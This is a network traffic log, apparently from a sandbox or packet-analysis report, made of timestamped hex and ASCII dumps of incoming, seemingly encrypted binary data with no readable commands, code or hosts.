2022-08-23 11:21:50 UTC	86	IN	Data Raw: 5f 21 48 25 30 a0 a4 63 96 d2 a6 82 56 09 c3 db b3 52 71 2c f3 91 4b 5a e5 8a a7 1b 64 a9 b2 fd 75 ac 51 ab fe 6d f6 e1 72 10 f9 c8 82 81 cd 6c bd 1d c2 25 d5 c0 ea 08 39 de ff 78 c1 1e c1 c3 ae eb 0b 86 64 94 58 92 af 23 24 ca 97 84 e8 a5 06 c3 f4 89 90 b2 88 32 2c a8 d0 cb 6e 36 c1 88 35 7b 29 f8 86 d7 43 65 50 51 ec d9 70 9f 75 8d 79 4c ca 5e aa a3 67 de 8d 83 54 71 2d b7 03 ca 13 f2 a0 b0 04 f4 ea 91 97 9d dd 9c 07 72 4f db 1e b1 15 4d 5d 77 34 37 83 21 e5 be bd af 31 92 3b ec a9 0d fa a9 7a 85 b6 43 20 0d 0f b0 c7 e5 c9 fd 14 aa 56 91 d2 f3 52 58 f9 c7 df 14 da a9 9b ca 04 ff ea 3a ee ea 9d 4f bb 03 a3 54 ab 30 b3 82 12 5e af 61 33 af ef 8d 7a 32 01 b4 8c a7 10 46 27 6a e2 5d aa 01 6b d4 d7 2d cd c2 a8 e2 57 fb fc fd c8 c5 19 8b 1b 4b 28 d4 b8 0a 99 Data Ascii: _!H%0cVRq,KZduQmrl%9xdX#$2,n65{)CePQpuyL^gTq-rOM]w47!1;zC VRX:OT0^a3z2F'j]k-WK(
2022-08-23 11:21:50 UTC	90	IN	Data Raw: fc cd f9 f7 3c 8e 40 bf 9c 3c 54 4e e5 d5 66 47 d5 b8 9c ca 0d 1e 90 04 6c 1e 74 98 11 09 b4 84 d7 04 a3 89 05 79 07 c7 0b de 67 76 85 33 3d 9c bc a7 51 50 31 59 f4 4c ac 06 fc d1 b8 6d f4 c3 a2 f3 91 95 31 fc c4 cf 76 ca 07 4b 2e c7 aa 12 8c bd 04 dc d5 e7 bf 1f 25 35 8e 21 49 d7 23 a3 52 8d 37 37 64 69 4d 7e 11 76 fd 4b ad bf a0 d7 ca 49 2a fe 6f c0 54 98 1c b2 fd 44 88 55 80 ce b3 68 c0 d1 6a 62 0c f1 48 02 c3 fc ed 38 4e 2b d4 c1 82 a3 59 86 48 f8 ec fd 01 e7 bf 70 7d 85 08 5e 49 d4 b5 71 38 cf 4e b4 cf 80 e7 54 ba 70 da 7b 17 24 09 e1 4b 45 cf 43 b3 d9 06 1e 1f 78 1e 13 96 d3 0c 62 3d ba 1d a6 d9 e8 70 d3 3f b3 63 49 9c 5e b1 25 69 e7 40 87 d0 00 76 09 4f fe ce 9b 4f 66 a8 32 c7 45 4f 2d 05 b4 37 0c ec 91 34 c4 25 23 fa e6 15 8e 0b 33 88 bc 52 f7 08 Data Ascii: <@<TNfGltygv3=QP1YLm1vK.%5!I#R77diM~vKI*oTDUhjbH8N+YHp}^Iq8NTp{$KECxb=p?cI^%i@vOOf2EO-74%#3R
2022-08-23 11:21:50 UTC	94	IN	Data Raw: 4a 6a d4 e1 70 2d 18 e4 3f 68 d0 41 91 dd 06 1e c2 ce 1f 13 96 23 09 4a 8b a8 0e a5 c9 29 71 d3 35 a5 e8 5f 85 44 4a 35 43 c6 b3 97 d4 37 31 5c 43 ed c1 b3 f9 67 b0 ca ee 93 47 05 f9 da 7d 0a e0 82 34 c8 34 34 e8 7c b1 8f 27 31 83 a3 46 fb 0f c8 49 c9 72 75 7b ac 50 3f 4e 58 de f8 e8 da 3f fe b3 6e 28 72 67 ad ec 1f 10 9a e9 42 09 3a 45 23 b9 f6 4c 9d 8d f9 8a 90 42 ac fc 4b 78 fa 72 64 78 6e 81 e1 27 df c6 69 87 02 8b a8 76 92 e5 2d 3b 08 2f fe 39 cf 57 b8 d3 11 53 19 3b c0 9b c5 53 bb 08 82 e7 a6 a2 21 00 5e 13 58 9b d6 43 66 ce d6 74 c1 9e 37 a5 80 59 ba c0 cf 86 e1 02 32 57 97 b4 da b8 54 1f fc ec 27 40 08 3c 0f dd 3e 6f a6 29 8e 78 e0 fc 56 c8 64 93 a1 4a 40 33 1b 00 f7 b7 21 4f 4f 95 ac 83 c0 76 15 9d a1 a6 8e b8 98 26 29 b1 89 0d f2 1b 4a 96 76 a2 Data Ascii: Jjp-?hA#J)q5_DJ5C71\CgG}444\|'1FIru{P?NX?n(rgB:E#LBKxrdxn'iv-;/9WS;S!^XCft7Y2WT'@<>o)xVdJ@3!OOv&)Jv
2022-08-23 11:21:50 UTC	97	IN	Data Raw: b8 4a 88 0b f5 f8 78 40 49 a2 64 61 5c 82 83 b6 f7 3f 45 22 d6 c8 d1 53 8d 32 ac 60 55 8f 42 b0 3d 2e 79 cd e6 e7 43 8c f7 5b 06 4e e9 fd aa 0e 3d 48 d1 96 b0 53 9c c2 f6 e1 7f 0c fd 4c 59 7b 9a 1f 73 c0 c7 bb 67 b7 d3 71 66 d1 a0 67 45 b4 61 4b f0 03 3e 07 f2 b8 53 c9 5c 99 ee c9 1b c2 c9 82 02 91 dd 28 5c 06 af 1a bf d3 c7 ed c2 32 ba da 4c 06 5e b3 2b 4b ef 3a 86 d0 06 85 52 48 e1 e1 a5 74 73 af 2b c9 9f ce 2d 03 db e1 1d eb 84 00 db a8 34 ea 74 67 ae 8b 32 9b b0 df ea 19 d2 7c 17 f3 59 74 aa ce 41 4e 46 f4 e4 4b a5 38 e1 98 65 a7 66 60 a3 c5 14 72 8a c2 58 32 10 db 30 bc f6 c1 89 93 18 a5 9c b8 ba f6 51 f7 ee 75 6a 52 67 17 0e 21 ec fe 40 1d d4 86 b7 e1 90 e7 32 1b 1b ac e6 c0 d1 49 90 2a 06 85 13 b8 db 8f df 60 bc 91 89 1e b8 ba 0e 96 5c 7c 5f 06 c7 Data Ascii: Jx@Ida\?E"S2`UB=.yC[N=HSLY{sgqfgEaK>S\(\2L^+K:RHts+-4tg2\|YtANFK8ef`rX20QujRg!@2I*`\\|_
2022-08-23 11:21:50 UTC	101	IN	Data Raw: 92 a3 f8 ac 63 1b 91 67 bc e9 9e e8 84 d4 58 78 ac 5d 2f ae d6 dc 98 94 07 17 ba 58 a9 ef cd 6d e0 66 55 9a 71 8b 1f ba f5 d1 75 bd 66 86 b7 7d 1d e6 32 3c 12 23 6b c1 d1 6c 90 70 06 85 13 b8 cc 97 d8 73 1a 0d 98 19 3b 88 31 0f 43 05 c3 9c c9 53 51 fa c5 70 cc 19 22 bf 9b 57 f0 47 37 98 d1 15 05 af 6e 54 38 bb 06 86 fa e2 3c 41 e3 a1 25 f0 29 4d 42 33 e1 70 7d fa 43 f7 6b c0 e0 4d 5f 18 07 12 7c de 36 6c 6f 13 84 db c2 ea 19 e3 aa d0 69 b8 92 0e e2 b5 96 23 c5 73 d6 90 63 8b c1 fd 19 7c 63 59 06 fd e6 08 4b 91 a7 fd be 7f a0 0d e3 aa 70 3f ab 50 d9 7e 41 6b 04 ba 18 ef 87 9d 66 3c ac db 74 aa d4 0f ef 21 65 71 eb 6a b0 54 e1 5f 70 17 3f 28 b3 58 94 2b 2d 04 3a 47 40 52 a5 fe a5 2a f7 3f 47 0e a8 58 e3 7c d1 ab 45 25 1f 63 5a fd 5a fb b2 f7 4d d9 92 a6 f8 Data Ascii: cgXx]/XmfUquf}2<#klps;1CSQp"WG7nT8<A%)MB3p}CkM_\|6loi#sc\|cYKp?P~Akf<t!eqjT_p?(X+-:G@R*?GX\|E%cZZM
2022-08-23 11:21:50 UTC	105	IN	Data Raw: ab 7d a6 15 f4 bd 70 fc 25 50 d3 11 11 6c 1b 95 2b 14 98 8a 75 af aa d5 51 95 12 f1 ee 0d ec 75 f2 c5 81 bb c9 bc 70 8b 33 58 53 46 b3 b1 38 1c 08 49 26 c1 a3 f0 84 29 2a c7 59 0d 9b d1 98 42 d0 37 47 39 ab ed 08 21 f3 ed 83 e1 ce 9d 9e 9b d8 75 ab 82 1e 88 a1 16 d5 3f 82 66 d0 7a ab 4e e1 5b ee 90 79 bd 77 a4 8f 17 aa d9 54 09 03 79 5c b8 18 7b ef 80 79 d0 d6 80 97 d0 01 2a d1 72 d9 a9 34 1a d4 f9 44 c5 ad fc fe 0c e7 25 d2 ea 17 dd 6e 28 5d be 01 e5 aa c5 03 56 d5 7a 89 9b 94 56 78 54 60 2e 22 8b e4 25 86 69 67 15 9d 4c 1a 7d 6b 5b 51 f0 6f a1 b7 7e 4b 3b 4f ec 52 0e 97 df e9 23 42 40 35 b8 b7 66 f9 cc ab 9d 7c e4 cb cf 75 5b 60 25 e8 89 6a dc f8 86 c7 d2 0f 9b b5 d5 27 a8 51 ad e8 05 9d c9 44 1a ef f1 20 0f d4 4a bf 17 ad 74 d8 df cd e7 3f 9d 2d 7b ba Data Ascii: }p%Pl+uQup3XSF8I&)YB7G9!u?fzN[ywTy\{yr4D%n(]VzVxT`."%igL}k[Qo~K;OR#B@5f\|u[`%j'QD Jt?-{
2022-08-23 11:21:50 UTC	110	IN	Data Raw: 4b 22 d4 7a 18 f6 20 5b 67 df 0f 02 f9 33 67 55 78 bd 9f f7 57 09 f6 48 3e a8 b7 66 ef cc ab 91 4f 09 da c8 3a 50 72 5f 4a 9a 63 40 f8 86 c7 7b cf ba b5 df 0f 05 53 ad e2 54 d6 f9 aa 69 41 f9 99 9a e3 c6 ae 18 a7 4d 78 c2 e0 13 26 de fc 78 c1 12 29 ed a1 e9 0f bd c6 9a 36 45 3a 3e 63 70 92 84 e8 c0 85 f1 f4 83 e4 16 b9 00 21 91 66 a6 2e 3e c3 f9 1b 7d 46 31 f4 79 4b 5c d5 79 59 db 61 93 5a 2a 7e 23 80 33 7a a8 76 df c4 5f 45 66 f1 b2 3b 60 02 e3 b5 ee b7 f7 e8 94 cf 47 ce 9b 25 19 21 a8 b4 a5 3d 77 75 da 3c 21 ba 32 4d ad b8 ca 6b ff f5 e7 b8 0c e6 cf 79 85 b6 15 68 0e 0f bc f9 7e fb fd 1e a2 3b 80 97 e2 50 2c 46 c0 b0 5e f0 1c 93 db 09 b8 91 39 ee ea e4 b7 01 02 a5 74 d3 05 6c 8c 3c 58 89 70 3e 91 93 a1 54 34 17 96 62 a7 16 66 31 59 f4 0d b0 06 7a d1 b8 Data Ascii: K"z [g3gUxWH>fO:Pr_Jc@{STiAMx&x)6E:>cp!f.>}F1yK\yYaZ*~#3zv_Ef;`G%!=wu<!2Mkyh~;P,F^9tl<Xp>T4bf1Yz
2022-08-23 11:21:50 UTC	114	IN	Data Raw: ca 48 b9 c0 77 83 32 e1 a9 03 91 4c 9e 84 bc 6d f2 eb 0e b6 d7 de ff ec 11 b1 46 97 73 e3 54 59 fb c6 ae d9 f7 a9 91 da 0e 8f 3f b6 c1 e0 8b 66 13 05 b2 56 d2 1e b5 94 0b 6d a1 86 34 87 93 98 7e 2b 37 95 aa b9 38 ba 31 59 fe 49 bd 01 73 f9 ae 6c cf c4 a8 2d 41 b1 19 d1 c8 cf 7c d9 11 5f 24 ee 9f 22 88 b7 f7 dd d3 cd 67 1f 24 34 fd 34 4b d7 29 a9 fe 24 1f f2 79 69 47 57 ac 42 f8 4d 05 9c a0 d7 cb 44 22 c7 56 c3 7c 77 24 ba fa 6c 6e 5c a8 2d b9 77 ea 74 d1 63 0c f6 57 75 19 fa fa bf 07 2e c5 c5 96 ab 5f f9 7d e6 e6 66 0f cb bf 6c 7d 85 04 5f 9e cb aa 62 07 c5 67 7c a0 dd e7 45 be bd c8 f1 89 0e 18 e4 25 4f c7 55 a3 52 3f 0c dd c7 82 1d 92 d4 00 52 85 b0 35 56 f1 d1 7b a0 1c a4 f9 5c 89 4b a5 30 6a c7 b3 e9 fb 07 19 45 45 20 d5 96 c0 4f a8 34 e5 ac 48 39 09 Data Ascii: Hw2LmFsTY?fVm4~+781YIsl-A\|_$"g$44K)$yiGWBMD"V\|w$ln\-wtcWu._}fl}_bg\|E%OUR?R5V{\K0jEE O4H9
2022-08-23 11:21:50 UTC	118	IN	Data Raw: 10 eb a3 5f 7d 85 04 40 47 d1 aa 6f 44 10 77 79 c9 97 3d 56 a3 72 dd d9 86 20 18 e4 35 4a df 49 91 35 32 1b c4 a6 ca 12 96 c4 05 5b 92 af 17 88 0d d5 71 d5 5a 71 f8 5a 9c 5c b0 25 67 de b0 ae 2d 02 19 45 20 2a c5 b3 ee 6f a0 1c 0e bf 4e 27 39 e9 7c 0c ec 8a 23 e5 d5 25 ed 61 75 a8 0a 32 9b b9 7a db 1f cd 55 26 74 48 70 82 bc 51 49 53 b1 ea d6 b4 39 ed a1 62 29 18 7a bd e9 04 f8 f4 31 46 1f 3a 34 2d bd f6 5b 8f fb f3 8a bc 4d d5 eb 50 6b f9 65 1a 89 70 8b 15 49 ec cf 60 9b c7 95 a6 6f ee fd 2c 2a 0b 26 98 33 cf 7b ba ba 1b 84 13 22 d2 e7 34 52 aa 07 f7 06 a6 8e 28 05 4d 6d 4e e4 88 48 71 10 d4 63 e4 90 25 a0 86 5b b3 ca 36 8e e5 e4 0b 33 62 24 3d a5 47 1c ef f0 33 53 99 20 22 ef 30 7b c0 c7 e0 70 eb 93 41 d6 74 bd 6b 24 b4 38 18 0c 8f c5 28 4e 49 88 eb 2f Data Ascii: _}@GoDwy=Vr 5JI52[qZqZ\%g-E oN'9\|#%au2zU&tHpQIS9b)z1F:4-[MPkepI`o,&3{"4R(MmNHqc%[63b$=G3S "0{pAtk$8(NI/
2022-08-23 11:21:50 UTC	122	IN	Data Raw: d4 06 83 39 4a b4 e9 c1 53 ae 12 e8 83 82 a3 21 30 43 0c 7f 65 d1 49 71 0b d6 58 35 84 24 a6 aa 26 c1 ba 30 87 c9 15 7b a9 4d 66 2a 82 58 6b dc ef 2a 5e f6 22 29 c7 cf 6c af 35 cb 1e 9f 9d 5d d7 70 a4 0e d1 65 14 17 20 ff aa 09 52 47 9f 84 c4 c8 5e e6 fd 89 f6 a6 d2 ec 6f 7f b3 8d 18 a9 a2 6f bb 72 88 c1 c8 a5 5c 74 7f 19 ee 52 f7 55 b6 81 16 d4 01 c1 90 e5 b1 47 6b bf 75 f4 70 fb 72 6f b3 16 19 87 9d 7e 88 53 c5 5e 8c 28 65 91 40 f8 77 f0 5e e5 29 c4 72 7e ad 26 42 bf 77 bb b7 2b 02 3f a1 34 ce a5 cb e1 48 0a 38 58 25 97 a5 79 59 fc 39 65 25 59 5c 20 69 5c e4 98 c9 28 de 8d 92 f2 0e da fc 59 76 a4 25 bf a6 d4 e0 dc 5c be 26 a5 09 95 3c 7b a1 55 75 3e 15 ac f9 28 37 57 7b 5c bc 18 44 66 aa 54 cf ff 84 11 f1 13 2c d3 09 85 80 cd 1f ed 10 6f af d3 81 ec 03 Data Ascii: 9JS!0CeIqX5$&0{MfXk^")l5]pe RG^oor\tRUGkupro~S^(e@w^)r~&Bw+?4H8X%yY9e%Y\ i\(Yv%\&<{Uu>(7W{\DfT,o
2022-08-23 11:21:50 UTC	126	IN	Data Raw: 21 8e f9 65 02 b0 36 43 3e 0f 8d 13 61 5c 7e a6 cc c3 f9 ad 65 d8 64 a4 bd 58 79 a0 3a d7 21 d9 34 d3 7a a7 7b 07 4f fc 3d 7b b9 5d 7e 3f 15 aa 49 67 64 27 5c 7c 4a 07 3c fc af 64 ce d9 9b 73 f9 d4 25 d3 0f b2 2a 4a 7f ec 16 41 e5 5e e0 ed 03 7d 11 f0 e2 cf fc b1 1e 5f bd 52 6f a7 c5 09 56 97 f0 24 99 92 76 d2 87 03 2f 28 a7 6b d3 86 63 7f e0 76 60 0b 5d 38 04 53 f0 65 ff 21 73 4b 31 7a 77 a9 0f 9d f1 77 a3 3c 2b 3f a2 a0 49 0c dd a4 82 c6 3f e7 f2 72 72 84 2c e1 98 43 61 e8 8a ad 10 4b 41 b4 d5 21 82 d3 d3 89 44 c6 e5 52 ec ef fb 99 0a ee 46 bd 3e 8d 93 d7 c0 e0 39 13 be 32 79 d6 3c 57 ff af ed 27 3c a9 f5 59 92 ba 04 fb be 93 84 74 96 03 e2 d2 a9 6d a4 bb 00 0b 97 da a4 2e 23 e9 7b 25 7c 40 1f 01 a9 28 5d df 55 cc 21 61 99 72 06 59 0e 98 7a 8a 51 76 d9 Data Ascii: !e6C>a\~edXy:!4z{O={]~?Igd'\\|J<ds%*JA^}_RoV$v/(kcv`]8Se!sK1zww<+?I?rr,CaKA!DRF>92y<W'<Ytm.#{%\|@(]U!arYzQv
2022-08-23 11:21:50 UTC	129	IN	Data Raw: de 18 05 97 7c ae 44 9e a8 68 5a 5f 56 f1 7a 0e 74 45 94 3c be 60 b1 b9 1c b4 58 19 0f d2 a7 1f dc 6d 1f b3 68 10 87 9d fc 85 87 d5 78 aa 52 0e ef 21 d9 73 e0 41 90 af c9 a6 71 8b 3f 1d 19 39 d2 b6 2b 1f 37 09 34 ce a3 7b ae 1b 79 1f 78 70 89 d3 e3 5c db 23 43 3a 30 6c 3b 98 5d e4 85 cb 53 a1 ec 95 d8 60 84 cf 59 76 a0 a0 ed 11 e0 eb f2 28 a0 51 85 11 87 28 7b bd 63 a4 c6 14 aa d5 68 cf 48 1b 5d b8 03 1c af 8e 79 c1 43 be 44 c3 0b 04 80 08 98 a8 14 3c f9 16 45 da 8c c8 14 02 e7 32 f7 75 97 bd 43 1e 5b 9d 26 4f a8 c5 93 6a 92 1b 03 b9 c0 5d 50 f9 42 6d 3c a3 4b 38 8f 4b 86 7b 53 4b 30 fd 66 91 52 f0 61 ff 50 7d 4b 31 fd 7a 7d 1c bb d7 08 20 42 4a 1e ee b0 69 f9 c2 b7 aa a5 1b ca e5 7e d0 0f 4d e0 98 67 6a b1 8b ad 08 f9 9d 98 c4 01 88 07 ac e8 45 e6 be 66 Data Ascii: \|DhZ_VztE<`XmhxR!sAq?9+74{yxp\#C:0l;]S`Yv(Q({chH]yCD<E2uC[&Oj]PBm<K8K{SK0fRaP}K1z} BJi~MgjEf
2022-08-23 11:21:50 UTC	133	IN	Data Raw: 09 4f 9f 0c 39 99 94 43 5f d1 9b 2f 28 a5 61 a1 f8 02 7e 7a 57 6d d7 7a 18 f0 c9 d5 48 cd 23 5c 86 30 67 5f 70 1a 81 f7 5d 3e 4b 62 c7 a3 a4 6f d3 5b da e3 5d 1a ce c3 9a 53 71 2c 7b bd 4e 58 c1 aa 63 09 63 b8 95 c8 3b a8 51 b2 e4 6d 3f e0 72 1c c5 79 e7 f1 ca 6b a8 38 62 64 d7 c0 7a 3c 13 a0 14 59 0e 15 ae fe 8f c2 11 be d7 8d 70 6b bf 24 0a 94 11 fa 8f b2 2e f7 d4 59 9b a4 bb 9a 0e 94 c4 82 0e e4 c0 82 24 5c 6a 29 87 d7 52 74 26 50 ec df 4b 1b 0c fd 7d 23 8e 7c 7b a8 76 d9 78 6b 78 60 01 81 fa 70 12 f2 86 ee 27 f5 ea 8a 94 15 cd 9b 29 2d c9 a5 79 a6 3d 79 7d a5 3f 21 b0 80 c7 82 a9 e6 51 42 3a e6 b8 2a ad 78 7b 85 a6 43 23 0d 0f b0 fb 4b 87 9c 15 a0 44 9f 45 e3 54 5f 72 e7 9d 46 fe 89 42 da 03 90 07 07 f2 e0 8b 78 10 2a 5a 53 c4 09 98 04 6a 14 88 70 30 Data Ascii: O9C_/(a~zWmzH#\0g_p]>Kbo[]Sq,{NXcc;Qm?ryk8bdz<Ypk$.Y$\j)Rt&PK}#\|{vxkx`p')-y=y}?!QB:x{C#KDET_rFBxZSjp0
2022-08-23 11:21:50 UTC	137	IN	Data Raw: c2 6e bd ec ca b1 a9 79 2a da 18 a3 1d 36 5f 77 3e bb 95 37 f0 89 98 8b 73 90 3b c6 8d 28 95 64 64 89 94 92 db 0c 09 9c 53 b3 98 fc 14 a4 60 f3 94 e2 54 c5 cd ef a1 72 f8 e5 93 db 03 b0 66 19 ee e0 96 4f f9 03 a3 54 ee 89 cc e3 15 75 8d 50 79 85 99 89 e0 11 3a 8e 9a 87 5d 4e 31 59 d4 04 8e 06 7a ce b2 45 36 c3 a2 f5 7a 12 4f 9d c9 cf 72 ea 54 49 2e c6 2b 07 a5 af 0f fd 9b e5 67 1f 05 76 df 34 4b c8 22 81 b4 96 1f e5 4e eb 39 37 b6 72 f9 6d ca 9e a0 d7 5a 60 0f c7 72 e0 1b 90 25 ba dc 19 aa 5d a8 37 9a 91 cb f9 f8 49 8e 89 3a 07 d2 fc da e5 16 2b d4 5a b4 82 59 ac 7e b7 e4 60 10 cb b3 6a 7c 85 1e 7b b9 c6 bb 61 01 44 08 18 ce 80 e3 65 e5 63 d7 e1 9e 04 35 f6 02 62 9f 41 b9 ce 16 72 e0 c9 1e 0c b5 ea f0 4b 9a b8 37 22 8f b0 70 d3 31 85 ab 58 9a 4f 2e 11 42 Data Ascii: ny*6_w>7s;(ddS`TrfOTuPy:]N1YzE6zOrTI.+gv4K"N97rmZ`r%]7I:+ZY~`j\|{aDec5bArK7"p1XO.B
2022-08-23 11:21:50 UTC	142	IN	Data Raw: 0c 6d 7e 2b c3 de da 7d 16 2b d4 e0 91 84 48 8a 44 cf 1f 61 10 ed fa ce 02 e4 03 53 44 e7 72 65 2b c2 ec 5c e2 92 c1 65 7d 63 d7 e1 24 25 33 e4 24 5d 8e 6b 40 cf 36 1d e8 4b 60 72 97 c2 0d 6a 50 bc 1d a0 6b f4 5c c2 13 85 33 58 9a 4f 94 70 44 cf ba 9e f8 ff 18 43 49 d4 46 cd 89 63 a8 30 cf 74 4c 2d 03 41 58 21 fd bd 07 06 36 25 ed 4b 09 a5 0b 32 83 98 ba fa 1e cb 7f b1 0d 38 75 aa 56 70 85 5b de f2 4d 91 12 ec 95 53 f7 75 67 bc c9 4a c5 9b c5 58 4e 18 a2 31 bc f0 77 1e ea 66 8a bc 43 9a 3b 53 6b ff e8 50 50 63 ad 3f eb f1 ce 60 bd 4d ad b7 7d 9e ee 05 d3 0c 30 f1 ed 4c 05 d1 d4 06 81 33 ea c8 88 c0 c9 8f 20 89 3f 87 40 2c 16 5c 5c f8 b1 d6 49 6c 3c 3c 71 cc 83 0e 22 fe 29 be db 35 a7 02 08 0a 33 f2 6e 08 b5 61 3a 33 ff 22 5e d6 93 08 ef 36 71 87 ca e0 70 Data Ascii: m~+}+HDaSDre+\e}c$%3$]k@6K`rjPk\3XOpDCIFc0tL-AX!6%K28uVp[MSugJXN1wfC;SkPPc?`M}0L3 ?@,\\Il<<q")53na:3"^6qp
2022-08-23 11:21:50 UTC	146	IN	Data Raw: 88 08 2a 9c 67 7d 2e 0d ff 1e 65 a8 fa ae b3 7d 51 48 e3 25 1c 89 15 9b b2 6a 2d 15 f8 07 bd 5f be 27 1b ad 8e ca e5 cf 6a 4d e0 cb a9 7d d3 73 23 dd 21 31 fe 14 76 97 3c 62 bb bc 83 8d c7 af 26 c3 95 2d 68 ba c9 6c 48 26 bd 76 33 c3 70 a3 39 ab b9 1c 81 23 f3 30 12 1a 75 48 57 b1 cb 6e 15 0c 8a c0 9f 99 29 4f 8f a7 d5 e3 96 c1 46 12 c5 eb 5b 8f 51 3f ce 0d db b7 d1 ff 14 5e 46 54 8d 1a 6a 10 f2 dc 0d 9a 27 fc d7 bc f5 07 5d 79 62 f5 4d e8 20 59 c5 1f 0a 8c 95 73 b7 b6 d9 57 91 1e 11 b1 2f a3 74 f6 7c f6 9d c7 63 52 ea 01 07 b0 62 9c 92 03 3b 37 66 4b fb 9b d6 b8 0b 52 0f 79 14 aa a0 91 58 e5 ee 9b e5 e9 a0 d8 e8 d4 35 4d 35 00 5c 0f 44 12 bb 72 44 88 a4 3a ef 18 ef 25 18 4c a6 66 82 15 dd 62 c4 9a 5c 81 74 97 b8 0c 35 b7 bf c4 8d bc 50 b9 81 03 65 96 2d Data Ascii: *g}.e}QH%j-_'jM}s#!1v<b&-hlH&v3p9#0uHWn)OF[Q?^FTj']ybM YsW/t\|cRb;7fKRyX5M5\DrD:%Lfb\t5Pe-
2022-08-23 11:21:50 UTC	150	IN	Data Raw: f9 43 56 9c 4f ba aa 2a 06 3e 59 32 c0 a6 ee 99 18 4a 73 67 3e 97 cf c1 40 c2 27 5c 26 31 2d 23 7f 44 f4 ba f6 d8 e6 b3 b7 f1 75 a7 ae 68 5b 83 5d cd 09 db fa e3 40 9e 7a b0 03 a1 4f 78 99 5b ab 04 32 74 24 9a 8c ed a1 99 79 8b fa 24 4b 83 27 0d 4e bf 0f b5 de 02 db 54 60 f2 c8 2f fb a3 00 7c 33 02 fa 0a d3 30 19 16 0d ab f8 a6 5f 9c a8 45 2e bd a4 4b f9 c8 72 22 8d ad 0d 9b d1 9e 70 be c6 0d e2 f8 e6 cf cc 97 fa 8d 7c c4 4e ef 57 86 f0 df b9 c3 eb c7 92 13 65 dc bd d4 cf 94 10 34 fb 56 4a 39 38 f7 a7 26 6a f7 e5 d0 a8 43 38 c2 af 7e 39 07 be d0 0e 1c 65 a9 36 e8 1f 4c fd 61 5b 3e 45 9b 91 c5 da 83 23 e0 4f e4 25 9d 94 98 60 49 e3 69 32 90 58 fd a5 e9 84 6d fd 8e d7 09 c4 c0 73 43 c2 f4 ef af df 5f 84 91 fa d7 c6 c6 59 75 c7 ab dc 45 47 a9 c3 73 01 35 56 Data Ascii: CVO*>Y2Jsg>@'\&1-#Duh[]@zOx[2t$y$K'NT`/\|30_E.Kr"p\|NWe4VJ98&jC8~9e6La[>E#O%`Ii2XmsC_YuEGs5V
2022-08-23 11:21:50 UTC	154	IN	Data Raw: b1 6d 2a c1 df 59 39 02 b4 d5 31 20 5a a0 37 c4 36 79 e7 4e 72 fd 83 7e 6e 06 05 54 c0 2c a1 03 df 41 6a 4e a1 92 5d 95 d8 74 d0 6a 77 13 62 87 2a 2e 1d e8 3c 08 94 ba 00 21 3a 1c 37 89 b6 b8 d3 d2 e7 c3 1a 32 a8 c4 a1 5f 60 8f d0 60 32 18 2d f7 87 02 05 90 0d ba 9d 70 ee 26 cb 2c 5a f2 08 c7 c6 0d b4 b3 1c 24 18 50 c6 58 10 37 a1 d3 b3 47 99 9b ee d5 de 9e e8 5d 74 2f bc 51 a9 37 61 55 45 30 2e be 17 f4 a1 ad 88 7c 87 31 f2 ed 58 ce 6f 77 9c b3 77 c8 11 1b e2 9c 9b a4 99 75 d7 20 d3 f7 84 3b 6d ca f1 82 65 f0 9f b0 a3 62 ea 56 4b 9b 83 ff 17 03 20 9b 72 f2 2f 82 08 f6 b3 54 bb e9 45 51 5f f9 d5 d5 59 7e 70 c6 a5 e5 87 39 85 72 c8 a2 3f 4f b2 09 1a 79 28 84 7a f7 15 2f 20 9e 23 e5 95 fd 27 43 d7 78 56 de 23 3d 23 bb ef d9 e8 01 d5 ab 30 d7 4d be 4a e4 7d Data Ascii: mY91 Z76yNr~nT,AjN]tjwb.<!:72_``2-p&,Z$PX7G]t/Q7aUE0.\|1Xowwu ;mebVK r/TEQ_Y~p9r?Oy(z/ #'CxV#=#0MJ}
2022-08-23 11:21:50 UTC	158	IN	Data Raw: da 01 90 23 3b 3e e6 8b 67 1d 02 fc 53 36 0e b0 82 14 75 49 6c 34 87 e3 89 25 35 e1 9d bc a7 02 4c c2 59 49 62 b1 06 25 d0 41 6c dc c3 a2 f3 50 94 32 fc fd cd 14 cb 1a 4e 1f c6 7d 23 c2 bd 18 dd 19 e6 35 1f 14 24 31 35 11 d7 18 a9 81 96 7d e3 75 69 8b 57 57 73 eb 4d 49 9d af d5 d6 45 ee d7 46 c2 42 92 e9 bb ea 46 9e 5d 78 2d bd 6a dc f9 2e 65 1a f5 4d 06 24 f9 ec b7 02 2b d7 c7 87 ad 5e 8a 7b e5 f0 62 06 eb 51 4f 6a 87 14 53 1c c5 ad 65 3d c2 ba 78 d6 82 f1 45 42 60 d8 e3 12 21 1b e3 2b 40 d8 43 69 c8 2f 19 d4 c9 3b 11 99 c0 1f 4a 0c b7 0b a2 e7 d1 f7 d1 23 a7 ef 5a f6 5d a2 36 79 cf 3b 81 df 04 0f 43 13 fc cb b1 fe 62 3e 3d e0 bd 58 2d 85 d9 72 0e fa 9b 4b df 3b 27 fb 6b ff 8c 04 30 8d b0 f7 e9 11 cf 43 37 a9 5b 7b a8 44 50 f9 5b c8 f0 c1 b4 c3 ed bc 71 Data Ascii: #;>gS6uIl4%5LYIb%AlP2N}#5$15}uiWWsMIEFBF]x-j.eM$+^{bQOjSe=xEB`!+@Ci/;J#Z]6y;Cb>=X-rK;'k0C7[{DP[q
2022-08-23 11:21:50 UTC	161	IN	Data Raw: e7 55 a2 a9 82 b8 e2 4e 55 71 36 a1 e7 70 9b fb ae df ab 97 ea 97 bc ec ca 83 00 26 58 db 10 a7 3d 7d 5d 77 be 21 21 3a 2e ae 00 c9 79 90 3b e6 b8 0a 15 64 ea a5 70 6a 1b 05 07 b6 d1 cd f9 fd 94 a0 d1 9f 5a e3 9d 56 e0 c2 b0 54 d8 a9 11 db 92 b0 eb 3a 20 e9 83 67 b6 60 a3 52 e4 0f a4 8a d8 74 56 79 3c 87 54 eb 7a 34 37 9c aa af c0 4a ee 50 fc 4c 48 64 7a d1 98 6d d9 ca 6e f2 b5 9d 39 fc 33 ad 76 ca 3a 4b 38 ce 61 24 6d b4 21 dd c1 84 67 1f 25 24 fc 34 87 d6 24 a3 45 97 c3 87 64 69 47 56 b1 72 31 4c 96 9c a8 d7 9c 20 22 d6 54 c0 10 90 7b a8 ef 44 80 5d a8 2b b2 68 c9 f9 f8 7b 23 d6 10 04 da f8 fa b5 14 2b d7 c0 d7 ac 85 80 65 ed ee 60 10 eb d0 48 7f 85 44 50 83 cd f3 6d 23 c2 76 79 cf 80 e4 45 f2 62 05 eb 4b 2b 10 e4 24 42 ce 43 ba ce 30 03 ed e8 55 11 9e Data Ascii: UNUq6p&X=}]w!!:.y;dpjZVT: 